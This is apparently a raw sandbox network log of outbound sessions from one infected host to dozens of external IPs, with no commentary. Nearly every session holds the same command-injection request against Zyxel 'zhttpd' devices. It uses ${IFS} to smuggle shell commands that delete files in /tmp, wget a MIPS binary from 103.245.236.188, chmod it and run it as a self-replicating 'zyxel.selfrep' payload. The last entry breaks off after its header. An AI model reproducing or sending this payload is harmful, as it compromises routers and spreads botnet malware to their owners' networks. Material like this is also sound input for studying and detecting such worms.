                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3780192.168.2.134031881.190.152.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.783943892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3781192.168.2.134778224.78.47.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.783982992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3782192.168.2.134995844.237.98.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.784006119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3783192.168.2.1360138156.46.190.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.784060955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3784192.168.2.136090070.221.76.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.784096003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3785192.168.2.1355474194.249.89.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.784152985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3786192.168.2.1334026167.249.90.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.784188986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3787192.168.2.1348848147.91.7.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.784234047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3788192.168.2.133820437.154.71.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.784272909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3789192.168.2.134450863.6.49.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.784343958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3790192.168.2.1341660187.249.103.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.784349918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3791192.168.2.135497827.16.68.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.784398079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3792192.168.2.133682481.5.237.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.784460068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3793192.168.2.135258275.78.35.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.784509897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3794192.168.2.1337888212.9.60.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.784550905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3795192.168.2.1356602145.231.193.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.784606934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3796192.168.2.134066486.121.145.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.784634113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3797192.168.2.1353424104.184.10.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.784683943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3798192.168.2.135055893.23.214.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.784713984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3799192.168.2.1349682189.149.115.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.784759998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3800192.168.2.1348510219.159.27.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.784780979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3801192.168.2.135752249.220.132.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.784833908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3802192.168.2.135108042.87.194.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.784882069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3803192.168.2.1357798107.139.74.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.784933090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3804192.168.2.1334868131.14.55.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.784982920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3805192.168.2.1356808179.93.187.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785021067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3806192.168.2.134881264.72.29.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785048962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3807192.168.2.1351674195.242.49.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785087109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3808192.168.2.135639099.57.91.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785135031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3809192.168.2.1351798116.186.51.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785196066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3810192.168.2.1340378134.121.183.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785280943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3811192.168.2.1341690170.104.81.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785314083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3812192.168.2.1360648128.75.193.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785370111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3813192.168.2.13607969.228.58.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785393953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3814192.168.2.1344458220.111.238.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785437107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3815192.168.2.1342364144.242.201.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785455942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3816192.168.2.134939038.165.37.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785520077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3817192.168.2.133516474.140.250.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785547018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3818192.168.2.1341166171.241.244.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785572052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3819192.168.2.1356712122.38.58.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785623074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3820192.168.2.1356170168.89.152.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785677910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3821192.168.2.1348088191.46.139.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785711050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3822192.168.2.13347048.18.144.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785737991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3823192.168.2.1347154186.106.250.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785797119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3824192.168.2.1352684122.10.17.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785846949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3825192.168.2.1344538174.195.188.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785872936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3826192.168.2.134699289.71.227.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785932064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3827192.168.2.1343962161.17.163.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785942078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3828192.168.2.13599861.99.50.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.785994053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3829192.168.2.134762493.112.25.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786042929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3830192.168.2.133851297.221.50.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786071062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3831192.168.2.135311847.147.221.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786113977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3832192.168.2.1350818161.71.244.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786159992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3833192.168.2.1333262153.54.231.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786190987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3834192.168.2.1346508165.240.3.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786223888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3835192.168.2.133857081.114.46.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786262035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3836192.168.2.1354892206.245.3.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786315918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3837192.168.2.135066081.206.109.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786355972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3838192.168.2.1334100162.65.228.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786380053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3839192.168.2.135289893.63.222.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786407948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3840192.168.2.1341098195.14.130.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786457062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3841192.168.2.134101458.71.181.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786492109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3842192.168.2.133481259.113.190.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:33.786531925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3843192.168.2.133987674.189.219.14443
                                                TimestampBytes transferredDirectionData
